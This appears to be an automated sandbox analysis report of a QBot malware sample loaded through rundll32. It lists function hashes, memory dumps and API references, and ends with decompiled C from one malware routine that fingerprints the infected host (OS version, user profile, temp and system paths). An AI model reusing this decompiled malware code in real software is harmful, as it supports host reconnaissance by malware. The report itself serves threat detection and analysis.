Instruction Fuzzy Hash: 5571DFB1944200DFDB10CF68D48865EB7F9BF46310F878159D96ADB396EF30A940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6AD94C60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198COMMON

Download Yara Rule

APIs

lpeg_set_defaults.050_QBOT ref: 6AD94CB3
lpeg_set_colorspace.050_QBOT ref: 6AD94CC6

Strings

T, xrefs: 6AD94E13
T, xrefs: 6AD94E18

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: lpeg_set_colorspacelpeg_set_defaults
String ID: T$T
API String ID: 1238304575-152709941
Opcode ID: 3b097d9bb3a82a5aac6b579832da24ad101eb866f4ef5c8b9f12fe72cd779cae
Instruction ID: 5669d77f0196abb09541f12b065b06d54c790ed7272d93d1eff1252bf0283afc
Opcode Fuzzy Hash: 3b097d9bb3a82a5aac6b579832da24ad101eb866f4ef5c8b9f12fe72cd779cae
Instruction Fuzzy Hash: 839107B8608350CFC744CF28C084A66BBF0BF99304F5649A9E9998B366D735E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ADC4D00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 6ADC4DA4
VirtualQuery.KERNEL32 ref: 6ADC4DD8
memcpy.MSVCRT ref: 6ADC4E01

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6ADC4F17, 6ADC4F43
Address %p has no image-section, xrefs: 6ADC4F2B

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: QueryVirtual$memcpy
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2264504374-157664173
Opcode ID: 24111475d2224d49a3310be673771e99438ce2be4a556ea7fae8b5e7b6f244b6
Instruction ID: d2aee75258144a234741a529dde6d5742a97a54de560bdcf7392abec5c5a9d56
Opcode Fuzzy Hash: 24111475d2224d49a3310be673771e99438ce2be4a556ea7fae8b5e7b6f244b6
Instruction Fuzzy Hash: 9331FBB15053019FD710DF19E58460ABBF9AF85748F86886DE889CB311F730D984CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6AD94F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

linit_memory_mgr.050_QBOT ref: 6AD94FEB
linit_marker_reader.050_QBOT ref: 6AD95083
linit_input_controller.050_QBOT ref: 6AD9508B

Strings

H, xrefs: 6AD9509A

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: linit_input_controllerlinit_marker_readerlinit_memory_mgr
String ID: H
API String ID: 2214435917-2852464175
Opcode ID: e25c2bec6530310f2659e09cd0d69c14425e1d784dba9eb933eba84cabbe6607
Instruction ID: df7413b6ea11ebe831d52a07390beabf7ab4cec8b17e4933af665bc9dc0eef73
Opcode Fuzzy Hash: e25c2bec6530310f2659e09cd0d69c14425e1d784dba9eb933eba84cabbe6607
Instruction Fuzzy Hash: 3D5127B1504341CFEB409F24C49A7477FA2EF45308F5A85A8DC494F39AC7BAC449CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6AD9C280 Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3e345aa76fe7250c9036806b672ebe074b997cb9e74fd6c3123059f4960f31
Instruction ID: 5c82de6ab288bc658a6ef02309b5ebd056ff84ab922924b4ce3d6def8c7b3fb9
Opcode Fuzzy Hash: fd3e345aa76fe7250c9036806b672ebe074b997cb9e74fd6c3123059f4960f31
Instruction Fuzzy Hash: 22D16975A48241DFD718CF28C055B627BF2BF8A300F4784A9D8898F3A2DB74E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6AD95BB0 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

ldiv_round_up.050_QBOT ref: 6AD95C66
ldiv_round_up.050_QBOT ref: 6AD95CA0
ldiv_round_up.050_QBOT(?), ref: 6AD95CEC
linit_upsampler.050_QBOT ref: 6AD95D10

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: ldiv_round_up$linit_upsampler
String ID:
API String ID: 217705101-0
Opcode ID: da5f2f2cfea2b43639568c02a8941e52612899b1af8d8b2027a139d06db0dbe5
Instruction ID: 80434f9f3f5ae4dd28d118be5abef8e07339e7408c6cf9c5450425bc7d23256c
Opcode Fuzzy Hash: da5f2f2cfea2b43639568c02a8941e52612899b1af8d8b2027a139d06db0dbe5
Instruction Fuzzy Hash: 03513774609701DFDB58DF28C1C4A5ABBE1FF89704F1688ADE9898B315DB30E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ADC4AC0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6ADC4AE5
__dllonexit.MSVCRT ref: 6ADC4B23
_unlock.MSVCRT ref: 6ADC4B53
_onexit.MSVCRT ref: 6ADC4B67

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: 60430c18888137938619c58bf4cf444f392e00b3fe098dbbed665fd4bea5b62c
Instruction ID: 983c72dcd00ff6fc5be3ffad00703c7a34335f25066d8c37b53ed1931195674b
Opcode Fuzzy Hash: 60430c18888137938619c58bf4cf444f392e00b3fe098dbbed665fd4bea5b62c
Instruction Fuzzy Hash: B211A4F49093008FDB40EFB9D58851EBBF4BB59214F43596DE8C5C7351EB3495848BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6AD82239 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

lpeg_write_tables.050_QBOT ref: 6AD8238C

Part of subcall function 6ADADEB0: memset.MSVCRT ref: 6ADADECA

lpeg_write_tables.050_QBOT ref: 6AD8246F

Strings

T, xrefs: 6AD823C9

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: lpeg_write_tables$memset
String ID: T
API String ID: 3144012921-3187964512
Opcode ID: 16579e418b7114580a242a58749bf80d80c295ca353e253c30fca1e3a5a70d42
Instruction ID: 4fdc3ac01e3d65ca0392028ace5de360d9fe5c146245f42c22aeaaf228dc7a27
Opcode Fuzzy Hash: 16579e418b7114580a242a58749bf80d80c295ca353e253c30fca1e3a5a70d42
Instruction Fuzzy Hash: 7781B2B56097419FC354CF29C584A0AFBF1BF88768F468A6EF99997310DB30E941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6AD97F90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

lround_up.050_QBOT ref: 6AD98017
lround_up.050_QBOT ref: 6AD9802D

Strings

x, xrefs: 6AD97FA2

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: lround_up
String ID: x
API String ID: 1674669303-2363233923
Opcode ID: 5e94dd32af8b4527e4628fc4a1b9cd76541ce9f8ce4fd41565f4bd195313e53a
Instruction ID: 29a580eb566f46f941f2f6de73a124049dd45205d8d3f5828e3b15dd7f315306
Opcode Fuzzy Hash: 5e94dd32af8b4527e4628fc4a1b9cd76541ce9f8ce4fd41565f4bd195313e53a
Instruction Fuzzy Hash: 125191B45053009FD740DF19C184A9ABBE1BF88708F16C9AEE88D8B316D776E946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6AD82A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

lround_up.050_QBOT ref: 6AD82AAA
lround_up.050_QBOT ref: 6AD82AC0

Strings

h, xrefs: 6AD82A52

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: lround_up
String ID: h
API String ID: 1674669303-2439710439
Opcode ID: f0bac1e6647a227ab9b6bef3a51b905cbed0bd53569b212af88ee7eb17eeadaa
Instruction ID: 1fba1324890fa87e8d68035a9d94754a5a3668e32579de7705a16ff4a65a52c2
Opcode Fuzzy Hash: f0bac1e6647a227ab9b6bef3a51b905cbed0bd53569b212af88ee7eb17eeadaa
Instruction Fuzzy Hash: 5641C5B99057009FC350CF15C184A9AFBF0FF88714F068AAEE8998B711D775A955CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6AD8155C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 6AD81580
FreeLibrary.KERNEL32 ref: 6AD815A2

Strings

__deregister_frame_info, xrefs: 6AD81575

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: __deregister_frame_info
API String ID: 3013587201-1515262489
Opcode ID: 98d4011d7fc9e54ddd4b5fa66f294f1959cac8d665bc0da1b81202120f2b0d71
Instruction ID: 782b1e555356ceae5262b15ddc5d94d78428f7c5180b692fe35614374b348a05
Opcode Fuzzy Hash: 98d4011d7fc9e54ddd4b5fa66f294f1959cac8d665bc0da1b81202120f2b0d71
Instruction Fuzzy Hash: C5E0C7B1504600DBEB007F79A5463277BF47B41205F42455CE462D7244EA34E809D7D3

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 7680, Parent PID: 7304COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.7%
Total number of Nodes:	1461
Total number of Limit Nodes:	8

Executed Functions

Function 1000BC31 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E1000BC31(void* __edx, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t70;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr* _t79;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t89;
				intOrPtr _t91;
				void* _t92;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t104;
				short _t109;
				char _t111;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t122;
				intOrPtr _t126;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t141;
				intOrPtr _t144;
				intOrPtr _t146;
				intOrPtr _t152;
				void* _t153;
				WCHAR* _t154;
				char* _t155;
				intOrPtr _t166;
				intOrPtr _t182;
				void* _t198;
				struct _OSVERSIONINFOA* _t199;
				void* _t200;
				void* _t202;
				char _t205;
				void* _t206;
				char* _t207;
				void* _t210;
				int* _t211;
				void* _t224;

				_t224 = __fp0;
				_t152 =  *0x10020fa8; // 0x10000000
				_t70 = E100091E7(0x1ac4);
				_t199 = _t70;
				if(_t199 != 0) {
					 *((intOrPtr*)(_t199 + 0x1640)) = GetCurrentProcessId();
					_t72 =  *0x10020fa0; // 0x474f8a0
					_t73 =  *((intOrPtr*)(_t72 + 0xb0))(_t200);
					_t3 = _t199 + 0x648; // 0x648
					E10014B0E( *((intOrPtr*)(_t199 + 0x1640)) + _t73, _t3);
					_t75 =  *0x10020fa0; // 0x474f8a0
					_t5 = _t199 + 0x1644; // 0x1644
					_t201 = _t5;
					_push(0x105);
					_push(_t5);
					_push(0);
					if( *((intOrPtr*)(_t75 + 0x12c))() != 0) {
						 *((intOrPtr*)(_t199 + 0x1854)) = E1000960F(_t201);
					}
					_t77 =  *0x10020fa0; // 0x474f8a0
					_t79 = E1000DD17( *((intOrPtr*)(_t77 + 0x130))()); // executed
					 *((intOrPtr*)(_t199 + 0x110)) = _t79;
					_t163 =  *_t79;
					if(E1000DE92( *_t79) == 0) {
						_t81 = E1000DD67(_t163, _t201); // executed
						__eflags = _t81;
						_t166 = (0 | _t81 > 0x00000000) + 1;
						__eflags = _t166;
						 *((intOrPtr*)(_t199 + 0x214)) = _t166;
					} else {
						 *((intOrPtr*)(_t199 + 0x214)) = 3;
					}
					_t14 = _t199 + 0x220; // 0x220, executed
					_t82 = E1000E68A(_t14); // executed
					 *((intOrPtr*)(_t199 + 0x218)) = _t82;
					_t83 = E1000E64F(_t14); // executed
					 *((intOrPtr*)(_t199 + 0x21c)) = _t83;
					_t17 = _t199 + 0x114; // 0x114
					_t202 = _t17;
					 *((intOrPtr*)(_t199 + 0x224)) = _t152;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t202);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x110)))));
					_t89 =  *0x10020fc8; // 0x474fb00
					_push(0); // executed
					if( *((intOrPtr*)(_t89 + 0x6c))() == 0) {
						GetLastError();
					}
					_t91 =  *0x10020fc0; // 0x474fa38
					_t92 =  *((intOrPtr*)(_t91 + 0x3c))(0x1000);
					_t28 = _t199 + 0x228; // 0x228
					_t153 = _t28;
					 *(_t199 + 0x1850) = 0 | _t92 > 0x00000000;
					if( *0x10020fa4 != 2) {
						E1000BB3A( *((intOrPtr*)(_t199 + 0x224)), _t153);
					} else {
						E1000BC04(_t153);
					}
					_t94 =  *0x10020fa4; // 0x1
					 *((intOrPtr*)(_t199 + 0xa0)) = _t94;
					_t219 = _t153;
					if(_t153 != 0) {
						 *((intOrPtr*)(_t199 + 0x434)) = E1000960F(_t153);
					}
					_t95 = E1000D214();
					_t35 = _t199 + 0xb0; // 0xb0
					_t203 = _t35;
					 *((intOrPtr*)(_t199 + 0xac)) = _t95;
					_t96 = E1000D001(_t35, _t219, _t224);
					_t37 = _t199 + 0xd0; // 0xd0
					E10009971(_t96, _t35, _t37);
					_t38 = _t199 + 0x438; // 0x438
					E10009626(_t153, _t38);
					_t100 = E1000E6E9(_t203, E1000CF09(_t35), 0);
					_t39 = _t199 + 0x100c; // 0x100c
					E1000D22A(_t100, _t39, _t224);
					_t102 =  *0x10020fa0; // 0x474f8a0
					_t104 = E1000DEE4( *((intOrPtr*)(_t102 + 0x130))(_t202)); // executed
					 *((intOrPtr*)(_t199 + 0x101c)) = _t104;
					E1000936A(_t199, 0, 0x9c);
					_t211 = _t210 + 0xc;
					_t199->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t199);
					 *((intOrPtr*)(_t199 + 0xa8)) = E1000B93E(_t103);
					_t109 = E1000B967(_t108);
					_t43 = _t199 + 0x1020; // 0x1020
					_t154 = _t43;
					 *((short*)(_t199 + 0x9c)) = _t109;
					GetWindowsDirectoryW(_t154, 0x104);
					_t111 = E100091B2(_t108, 0x83);
					_t182 =  *0x10020fa0; // 0x474f8a0
					_t205 = _t111;
					 *_t211 = 0x104;
					_push( &_v668);
					_push(_t205);
					_v8 = _t205;
					if( *((intOrPtr*)(_t182 + 0xf0))() == 0) {
						_t146 =  *0x10020fa0; // 0x474f8a0
						 *((intOrPtr*)(_t146 + 0x10c))(_t205, _t154);
					}
					E10009E2E( &_v8);
					_t116 =  *0x10020fa0; // 0x474f8a0
					_t50 = _t199 + 0x1434; // 0x1434
					_t206 = _t50;
					 *_t211 = 0x209;
					_push(_t206);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t116 + 0xf0))() == 0) {
						E1000C172(_t206, 0x105, L"%s\\%s", _t154);
						_t144 =  *0x10020fa0; // 0x474f8a0
						_t211 =  &(_t211[5]);
						 *((intOrPtr*)(_t144 + 0x10c))(L"USERPROFILE", _t206, "TEMP");
					}
					_push(0x20a);
					_t53 = _t199 + 0x122a; // 0x122a
					_t155 = L"TEMP";
					_t119 =  *0x10020fa0; // 0x474f8a0
					_push(_t155);
					if( *((intOrPtr*)(_t119 + 0xf0))() == 0) {
						_t141 =  *0x10020fa0; // 0x474f8a0
						 *((intOrPtr*)(_t141 + 0x10c))(_t155, _t206);
					}
					_push(0x40);
					_t207 = L"SystemDrive";
					_push( &_v144);
					_t122 =  *0x10020fa0; // 0x474f8a0
					_push(_t207);
					if( *((intOrPtr*)(_t122 + 0xf0))() == 0) {
						_t139 =  *0x10020fa0; // 0x474f8a0
						 *((intOrPtr*)(_t139 + 0x10c))(_t207, L"C:");
					}
					_v8 = 0x7f;
					_t61 = _t199 + 0x199c; // 0x199c
					_t126 =  *0x10020fa0; // 0x474f8a0
					 *((intOrPtr*)(_t126 + 0xc0))(_t61,  &_v8);
					_t64 = _t199 + 0x100c; // 0x100c
					E10014B0E(E1000E6E9(_t64, E1000CF09(_t64), 0),  &_v2644);
					_t65 = _t199 + 0x1858; // 0x1858
					E10014AE0( &_v2644, _t65, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t68 = _t199 + 0x1878; // 0x1878
					_t198 = 0x14;
					E100096F3(_t68, _t198);
					_t137 = E1000B5E5(_t68, _t198); // executed
					 *((intOrPtr*)(_t199 + 0x1898)) = _t137;
					return _t199;
				}
				return _t70;
			}

0x1000bc31
0x1000bc3b
0x1000bc47
0x1000bc4c
0x1000bc51
0x1000bc5e
0x1000bc64
0x1000bc69
0x1000bc6f
0x1000bc7f
0x1000bc84
0x1000bc89
0x1000bc89
0x1000bc91
0x1000bc96
0x1000bc97
0x1000bca1
0x1000bcaa
0x1000bcaa
0x1000bcb0
0x1000bcbd
0x1000bcc2
0x1000bcc8
0x1000bcd1
0x1000bcdf
0x1000bce6
0x1000bceb
0x1000bceb
0x1000bcec
0x1000bcd3
0x1000bcd3
0x1000bcd3
0x1000bcf2
0x1000bcf8
0x1000bcfd
0x1000bd03
0x1000bd08
0x1000bd0e
0x1000bd0e
0x1000bd17
0x1000bd1d
0x1000bd21
0x1000bd28
0x1000bd2f
0x1000bd36
0x1000bd3a
0x1000bd41
0x1000bd42
0x1000bd44
0x1000bd49
0x1000bd50
0x1000bd52
0x1000bd52
0x1000bd58
0x1000bd62
0x1000bd67
0x1000bd67
0x1000bd72
0x1000bd7f
0x1000bd92
0x1000bd81
0x1000bd83
0x1000bd83
0x1000bd97
0x1000bd9c
0x1000bda2
0x1000bda4
0x1000bdad
0x1000bdad
0x1000bdb5
0x1000bdba
0x1000bdba
0x1000bdc0
0x1000bdcb
0x1000bdd0
0x1000bdd8
0x1000bdde
0x1000bde6
0x1000bdf8
0x1000bdfe
0x1000be06
0x1000be0b
0x1000be18
0x1000be29
0x1000be2f
0x1000be34
0x1000be37
0x1000be3a
0x1000be47
0x1000be4d
0x1000be57
0x1000be57
0x1000be5d
0x1000be65
0x1000be70
0x1000be75
0x1000be7b
0x1000be7d
0x1000be8a
0x1000be8b
0x1000be8c
0x1000be97
0x1000be99
0x1000bea0
0x1000bea0
0x1000beaa
0x1000beaf
0x1000beb4
0x1000beb4
0x1000beba
0x1000bec1
0x1000bec2
0x1000becf
0x1000bee2
0x1000bee7
0x1000beec
0x1000bef5
0x1000bef5
0x1000befb
0x1000bf00
0x1000bf06
0x1000bf0c
0x1000bf11
0x1000bf1a
0x1000bf1c
0x1000bf23
0x1000bf23
0x1000bf29
0x1000bf31
0x1000bf36
0x1000bf37
0x1000bf3c
0x1000bf45
0x1000bf47
0x1000bf52
0x1000bf52
0x1000bf5b
0x1000bf63
0x1000bf6a
0x1000bf6f
0x1000bf7e
0x1000bf96
0x1000bf9d
0x1000bfab
0x1000bfb6
0x1000bfb7
0x1000bfbb
0x1000bfc1
0x1000bfc2
0x1000bfca
0x1000bfcf
0x00000000
0x1000bfd7
0x1000bfdb

APIs

GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 1000BC58
GetLastError.KERNEL32(?,?,00000000), ref: 1000BD52
GetVersionExA.KERNEL32(00000000,?,?,00000000), ref: 1000BE3A

